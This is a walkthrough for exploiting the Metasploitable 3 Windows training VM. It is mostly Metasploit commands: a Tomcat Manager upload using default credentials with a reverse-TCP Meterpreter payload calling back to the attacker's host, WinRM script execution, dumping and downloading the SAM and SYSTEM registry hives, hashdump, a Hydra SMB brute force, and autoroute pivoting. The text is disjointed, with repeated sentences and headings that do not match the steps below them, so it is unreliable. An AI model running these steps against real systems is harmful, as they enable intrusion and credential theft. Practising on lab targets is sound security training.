Metasploitable 3 Windows Walkthrough

This is a classic exploit. Tomcat is running on port 8282.

You now have access to the Tomcat Manager. We can use this to upload a malicious JSP payload.

Using Metasploit for the Tomcat Exploit: metasploitable 3 windows walkthrough

use exploit/multi/http/tomcat_mgr_upload
set RHOSTS <Target_IP>
set RPORT 8282
set HttpUsername tomcat
set HttpPassword tomcat
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST <Your_IP>
run

Result: You should receive a Meterpreter session running as NT AUTHORITY\SYSTEM. You have already won! But for the sake of learning, let's look at the next vector.

If you have a hash (e.g., from SMB capture): This is a classic exploit

msf6 > use exploit/windows/winrm/winrm_script_exec
msf6 > set RHOSTS 192.168.1.100
msf6 > set USERNAME vagrant
msf6 > set PASSWORD vagrant
msf6 > set FORCE_VBS true
msf6 > exploit

reg save hklm\sam C:\sam.save
reg save hklm\system C:\system.save
download C:\sam.save /root/
download C:\system.save /root/

Then offline crack with samdump2 or secretsdump from impacket.

Unlike a simple VM download, Metasploitable 3 must be built using Packer and Vagrant. Here’s the streamlined process. You now have access to the Tomcat Manager

The holy grail of Windows exploitation is the SAM database.

hashdump

You will see the local user hashes (LM/NTLM). You can crack these offline using Hashcat or John the Ripper.

hydra -l administrator -P /usr/share/wordlists/rockyou.txt 192.168.56.102 smb

The password is often vagrant or mcpassword123. (Check the Vagrant build files).

run autoroute -s 192.168.1.0/24 background